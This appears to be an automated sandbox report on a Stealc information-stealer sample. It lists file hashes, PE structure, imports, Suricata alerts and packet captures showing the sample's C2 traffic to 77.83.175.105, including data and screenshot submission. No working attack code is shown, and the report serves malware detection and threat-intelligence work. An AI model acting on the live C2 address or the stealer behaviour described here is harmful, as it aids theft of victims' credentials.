                                                                                                                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.275057642635205
                                                                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.55%
                                                                                                                                                                                                                                                                                                                                • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                                File name:hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File size:720'896 bytes
                                                                                                                                                                                                                                                                                                                                MD5:ae721f6a78bdd19999a514e3f1ba8053
                                                                                                                                                                                                                                                                                                                                SHA1:335a17664b77c110da2d5ff2edebb557b1fc2032
                                                                                                                                                                                                                                                                                                                                SHA256:9a55faec755f08d982ab8602bf4a6d22f78603658bd93904bfce769ddb9bf5c7
                                                                                                                                                                                                                                                                                                                                SHA512:8f4795aa0916ae597b1e4078d02dcfc7bbfd2b9502bf32352400ae59a150943abbcb27924b4979035dbef045fc471c72a51762450a93240d517b449edee787de
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:jEHZv+b5FE1wJRh8K85GzKbppzBfgPqGFJeIN7EW3p6NtxXXXGNXZ6:jWZm9+c380zERWJeFWZ6PhX2/6
                                                                                                                                                                                                                                                                                                                                TLSH:48E41216F596D470C9A28AB89835C2F82ABFBC72C511459B37583FAF3C707C26A13359
                                                                                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........k.O.8.O.8.O.8..D8.O.8..U8.O.8..C8.O.8...8.O.8.O.8.O.8..J8.O.8..T8.O.8..Q8.O.8Rich.O.8........................PE..L......d...

                                                                                                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                                                                                                Icon Hash:63596de971436e0f

                                                                                                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Entrypoint:0x40609a
                                                                                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                                Time Stamp:0x64F61491 [Mon Sep 4 17:32:01 2023 UTC]
                                                                                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                Import Hash:5fd49ca5d77790b79623d48a6ad5d073

                                                                                                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                                                                call 00007FAED44D186Eh
                                                                                                                                                                                                                                                                                                                                jmp 00007FAED44CCE3Eh
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                call 00007FAED44CCFFCh
                                                                                                                                                                                                                                                                                                                                xchg cl, ch
                                                                                                                                                                                                                                                                                                                                jmp 00007FAED44CCFE4h
                                                                                                                                                                                                                                                                                                                                call 00007FAED44CCFF3h
                                                                                                                                                                                                                                                                                                                                fxch st(0), st(1)
                                                                                                                                                                                                                                                                                                                                jmp 00007FAED44CCFDBh
                                                                                                                                                                                                                                                                                                                                fabs
                                                                                                                                                                                                                                                                                                                                fld1
                                                                                                                                                                                                                                                                                                                                mov ch, cl
                                                                                                                                                                                                                                                                                                                                xor cl, cl
                                                                                                                                                                                                                                                                                                                                jmp 00007FAED44CCFD1h
                                                                                                                                                                                                                                                                                                                                mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                                                                                                                                                                                                                                                                                                fabs
                                                                                                                                                                                                                                                                                                                                fxch st(0), st(1)
                                                                                                                                                                                                                                                                                                                                fabs
                                                                                                                                                                                                                                                                                                                                fxch st(0), st(1)
                                                                                                                                                                                                                                                                                                                                fpatan
                                                                                                                                                                                                                                                                                                                                or cl, cl
                                                                                                                                                                                                                                                                                                                                je 00007FAED44CCFC6h
                                                                                                                                                                                                                                                                                                                                fldpi
                                                                                                                                                                                                                                                                                                                                fsubrp st(1), st(0)
                                                                                                                                                                                                                                                                                                                                or ch, ch
                                                                                                                                                                                                                                                                                                                                je 00007FAED44CCFC4h
                                                                                                                                                                                                                                                                                                                                fchs
                                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                                fabs
                                                                                                                                                                                                                                                                                                                                fld st(0), st(0)
                                                                                                                                                                                                                                                                                                                                fld st(0), st(0)
                                                                                                                                                                                                                                                                                                                                fld1
                                                                                                                                                                                                                                                                                                                                fsubrp st(1), st(0)
                                                                                                                                                                                                                                                                                                                                fxch st(0), st(1)
                                                                                                                                                                                                                                                                                                                                fld1
                                                                                                                                                                                                                                                                                                                                faddp st(1), st(0)
                                                                                                                                                                                                                                                                                                                                fmulp st(1), st(0)
                                                                                                                                                                                                                                                                                                                                ftst
                                                                                                                                                                                                                                                                                                                                wait
                                                                                                                                                                                                                                                                                                                                fstsw word ptr [ebp-000000A0h]
                                                                                                                                                                                                                                                                                                                                wait
                                                                                                                                                                                                                                                                                                                                test byte ptr [ebp-0000009Fh], 00000001h
                                                                                                                                                                                                                                                                                                                                jne 00007FAED44CCFC7h
                                                                                                                                                                                                                                                                                                                                xor ch, ch
                                                                                                                                                                                                                                                                                                                                fsqrt
                                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                                pop eax
                                                                                                                                                                                                                                                                                                                                jmp 00007FAED44CD5FFh
                                                                                                                                                                                                                                                                                                                                fstp st(0)
                                                                                                                                                                                                                                                                                                                                fld tbyte ptr [0049508Ah]
                                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                                fstp st(0)
                                                                                                                                                                                                                                                                                                                                or cl, cl
                                                                                                                                                                                                                                                                                                                                je 00007FAED44CCFCDh
                                                                                                                                                                                                                                                                                                                                fstp st(0)
                                                                                                                                                                                                                                                                                                                                fldpi
                                                                                                                                                                                                                                                                                                                                or ch, ch
                                                                                                                                                                                                                                                                                                                                je 00007FAED44CCFC4h
                                                                                                                                                                                                                                                                                                                                fchs
                                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                                fstp st(0)
                                                                                                                                                                                                                                                                                                                                fldz
                                                                                                                                                                                                                                                                                                                                or ch, ch
                                                                                                                                                                                                                                                                                                                                je 00007FAED44CCFB9h
                                                                                                                                                                                                                                                                                                                                fchs
                                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                                fstp st(0)
                                                                                                                                                                                                                                                                                                                                jmp 00007FAED44CD5D5h
                                                                                                                                                                                                                                                                                                                                fstp st(0)
                                                                                                                                                                                                                                                                                                                                mov cl, ch
                                                                                                                                                                                                                                                                                                                                jmp 00007FAED44CCFC2h
                                                                                                                                                                                                                                                                                                                                call 00007FAED44CCF8Eh
                                                                                                                                                                                                                                                                                                                                jmp 00007FAED44CD5E0h
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                                                push ebp

                                                                                                                                                                                                                                                                                                                                Rich Headers

                                                                                                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                                                                                                • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                                                                                                • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                                                                                                • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                                                                                                • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                                                                                                • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                                                                                                • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x93fc40x50.text
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa70000x14640.rsrc
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2eb0000xb1c.reloc
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x48600x40.text
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x1ac.text
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                                .text0x10000x939820x93a004ef5f1bde9e0985529071d6d678f8533False0.8652872962531752data7.618247709813183IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                .data0x950000x118840x6000f5d031125d84d839e33c628e9f1f10b3False0.07816569010416667dBase III DBT, next free block index 75651550.9097807088225928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                .rsrc0xa70000x2436400x14800eba4fa8ff2f9be9c0a10610275745d30unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                .reloc0x2eb0000x18080x1a00b6641a467578a0253ebbde7d8f905ca2False0.37169471153846156data3.6969114108903764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                                BARUY0xb1bc80x136fASCII text, with very long lines (4975), with no line terminatorsTamilIndia0.5951758793969849
                                                                                                                                                                                                                                                                                                                                BARUY0xb1bc80x136fASCII text, with very long lines (4975), with no line terminatorsTamilSri Lanka0.5951758793969849
                                                                                                                                                                                                                                                                                                                                BIFETUGIDOSUCIVIK0xb2f380x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilIndia0.5883037909173243
                                                                                                                                                                                                                                                                                                                                BIFETUGIDOSUCIVIK0xb2f380x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilSri Lanka0.5883037909173243
                                                                                                                                                                                                                                                                                                                                ZEPELEVOSATOWOCEDUHUWETUHUG0xb11e00x9e7ASCII text, with very long lines (2535), with no line terminatorsTamilIndia0.6015779092702169
                                                                                                                                                                                                                                                                                                                                ZEPELEVOSATOWOCEDUHUWETUHUG0xb11e00x9e7ASCII text, with very long lines (2535), with no line terminatorsTamilSri Lanka0.6015779092702169
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0xb4dc80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0xb5c700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0xb65180x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0xb6ab00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0xb6be00xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0xb6cb80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0xb7b600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0xb84080x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0xb89a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0xb98480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0xba0f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                                                                                                                                                                                                                                                                                RT_ICON0xa78a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5316820276497696
                                                                                                                                                                                                                                                                                                                                RT_ICON0xa78a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5316820276497696
                                                                                                                                                                                                                                                                                                                                RT_ICON0xa7f680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.4091286307053942
                                                                                                                                                                                                                                                                                                                                RT_ICON0xa7f680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.4091286307053942
                                                                                                                                                                                                                                                                                                                                RT_ICON0xaa5100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.44858156028368795
                                                                                                                                                                                                                                                                                                                                RT_ICON0xaa5100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.44858156028368795
                                                                                                                                                                                                                                                                                                                                RT_ICON0xaa9a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.3699360341151386
                                                                                                                                                                                                                                                                                                                                RT_ICON0xaa9a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.3699360341151386
                                                                                                                                                                                                                                                                                                                                RT_ICON0xab8500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5036101083032491
                                                                                                                                                                                                                                                                                                                                RT_ICON0xab8500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5036101083032491
                                                                                                                                                                                                                                                                                                                                RT_ICON0xac0f80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.5771889400921659
                                                                                                                                                                                                                                                                                                                                RT_ICON0xac0f80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.5771889400921659
                                                                                                                                                                                                                                                                                                                                RT_ICON0xac7c00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6466763005780347
                                                                                                                                                                                                                                                                                                                                RT_ICON0xac7c00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6466763005780347
                                                                                                                                                                                                                                                                                                                                RT_ICON0xacd280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.4537344398340249
                                                                                                                                                                                                                                                                                                                                RT_ICON0xacd280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.4537344398340249
                                                                                                                                                                                                                                                                                                                                RT_ICON0xaf2d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.4643527204502814
                                                                                                                                                                                                                                                                                                                                RT_ICON0xaf2d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.4643527204502814
                                                                                                                                                                                                                                                                                                                                RT_ICON0xb03780x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.4516393442622951
                                                                                                                                                                                                                                                                                                                                RT_ICON0xb03780x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.4516393442622951
                                                                                                                                                                                                                                                                                                                                RT_ICON0xb0d000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.500886524822695
                                                                                                                                                                                                                                                                                                                                RT_ICON0xb0d000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.500886524822695
                                                                                                                                                                                                                                                                                                                                RT_DIALOG0xba8e00x58data0.8977272727272727
                                                                                                                                                                                                                                                                                                                                RT_STRING0xba9380x36edataTamilIndia0.4612756264236902
                                                                                                                                                                                                                                                                                                                                RT_STRING0xba9380x36edataTamilSri Lanka0.4612756264236902
                                                                                                                                                                                                                                                                                                                                RT_STRING0xbaca80x3cadataTamilIndia0.4587628865979381
                                                                                                                                                                                                                                                                                                                                RT_STRING0xbaca80x3cadataTamilSri Lanka0.4587628865979381
                                                                                                                                                                                                                                                                                                                                RT_STRING0xbb0780x3bcdataTamilIndia0.4686192468619247
                                                                                                                                                                                                                                                                                                                                RT_STRING0xbb0780x3bcdataTamilSri Lanka0.4686192468619247
                                                                                                                                                                                                                                                                                                                                RT_STRING0xbb4380x208dataTamilIndia0.5192307692307693
                                                                                                                                                                                                                                                                                                                                RT_STRING0xbb4380x208dataTamilSri Lanka0.5192307692307693
                                                                                                                                                                                                                                                                                                                                RT_ACCELERATOR0xb4d700x58dataTamilIndia0.7954545454545454
                                                                                                                                                                                                                                                                                                                                RT_ACCELERATOR0xb4d700x58dataTamilSri Lanka0.7954545454545454
                                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0xb6a800x30data0.9375
                                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0xb6c900x22data1.0588235294117647
                                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0xb89700x30data0.9375
                                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0xba6580x30data0.9375
                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0xaa9780x30dataTamilIndia0.9375
                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0xaa9780x30dataTamilSri Lanka0.9375
                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0xb11680x76dataTamilIndia0.6694915254237288
                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0xb11680x76dataTamilSri Lanka0.6694915254237288
                                                                                                                                                                                                                                                                                                                                RT_VERSION0xba6880x258data0.5366666666666666

                                                                                                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                                                                                                KERNEL32.dllTlsGetValue, CallNamedPipeA, CreateProcessW, InterlockedIncrement, InterlockedDecrement, GetCurrentProcess, GetLogicalDriveStringsW, CreateJobObjectW, WriteConsoleInputA, GetComputerNameW, GetTimeFormatA, FreeEnvironmentStringsA, GetTickCount, GetCommConfig, GetNumberFormatA, ClearCommBreak, GetConsoleAliasExesW, EnumTimeFormatsA, GetCurrencyFormatW, SetFileShortNameW, LoadLibraryW, ReadConsoleInputA, GlobalMemoryStatus, SetVolumeMountPointA, GetVersionExW, GetFileAttributesW, GetModuleFileNameW, LCMapStringA, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, GetDiskFreeSpaceW, LoadLibraryA, OpenJobObjectW, SetEnvironmentVariableA, GlobalWire, GetModuleFileNameA, GetCurrentDirectoryA, OpenEventW, GetShortPathNameW, SetFileAttributesW, IsBadCodePtr, GetTempFileNameW, CreateFileA, HeapAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, HeapReAlloc, GetStartupInfoW, RaiseException, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, GetStartupInfoA, TerminateProcess, IsDebuggerPresent, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleHandleA, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, HeapSize, GetLocaleInfoA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CloseHandle
                                                                                                                                                                                                                                                                                                                                GDI32.dllGetCharWidth32A
                                                                                                                                                                                                                                                                                                                                WINHTTP.dllWinHttpOpen

                                                                                                                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                                TamilIndia
                                                                                                                                                                                                                                                                                                                                TamilSri Lanka

                                                                                                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:01.599986+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54970677.83.175.10580TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:01.859632+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.54970677.83.175.10580TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:01.866726+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config177.83.175.10580192.168.2.549706TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:02.104315+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.54970677.83.175.10580TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:02.113665+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config177.83.175.10580192.168.2.549706TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:02.690279+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.54970677.83.175.10580TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:03.155935+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54970677.83.175.10580TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:28.274643+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54979677.83.175.10580TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:36.389930+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54987577.83.175.10580TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:39.377115+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54987577.83.175.10580TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:40.916327+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54987577.83.175.10580TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:43.877065+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54987577.83.175.10580TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:44.415978+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54987577.83.175.10580TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:45.996286+01002044249ET MALWARE Win32/Stealc Submitting Screenshot to C21192.168.2.54987577.83.175.10580TCP
                                                                                                                                                                                                                                                                                                                                2024-10-28T22:02:48.379824+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54993887.106.236.48443TCP

                                                                                                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:01:55.997478008 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:01:55.997483015 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:01:56.106894970 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:00.430671930 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:00.436817884 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:00.436896086 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:00.437035084 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:00.442960024 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.268872976 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.269016981 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.308146000 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.313792944 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.599903107 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.599986076 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.616643906 CET4970680192.168.2.577.83.175.105
